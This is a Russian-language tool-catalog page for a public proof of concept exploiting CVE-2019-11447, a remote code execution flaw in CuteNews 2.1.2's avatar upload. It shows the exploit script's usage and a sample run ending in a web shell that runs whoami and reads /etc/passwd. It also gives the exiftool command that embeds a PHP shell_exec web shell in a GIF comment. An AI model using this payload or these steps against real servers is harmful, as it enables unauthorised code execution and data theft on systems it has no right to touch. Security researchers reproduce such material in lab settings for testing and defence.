Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-11447-POC — CuteNews 2.1.2 - Доказательство концепции CVE-2019-11447 | Kitploit
Инструменты/GitHubGitHub/crfslick/cve-2019-11447-poc
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubcrfslick/cve-2019-11447-poc

CVE-2019-11447-POC

CuteNews 2.1.2 - Доказательство концепции CVE-2019-11447

Репозиторий
122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

sadnews

CuteNews 2.1.2 — CVE-2019-11447 Доказательство концепции

POC от CRFSlick, обнаружен AkkuS <Özkan Mustafa Akkuş>

Была обнаружена проблема в CutePHP CuteNews 2.1.2. Злоумышленник может проникнуть на сервер через процесс загрузки аватара в области профиля, используя поле avatar_file для index.php?mod=main&opt=personal. Отсутствует эффективный контроль $imgsize в /core/modules/dashboard.php. Содержимое заголовка файла может быть изменено, а контроль обойдён для выполнения кода. (Для этого злоумышленник может использовать заголовок GIF.)

Использование

root@kitploit:~
Usage:
	CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
	CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> whoami
www-data

$> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Вредоносный GIF

Вредоносный gif был взят из интернета, а затем модифицирован с помощью exiftool для вставки необходимого PHP

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif

Exiftool покажет метаданные изображения, где вы найдёте размещённый PHP-код внутри комментария

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif
ExifTool Version Number         : 12.05
File Name                       : sad.gif
...
Comment                         : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...

Источники

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
  • http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html

Отказ от ответственности

Данный проект предназначен исключительно для образовательных целей и не может использоваться для нарушения закона или получения личной выгоды. Автор этого проекта не несёт ответственности за любой возможный вред, причинённый материалами.

Скачать инструмент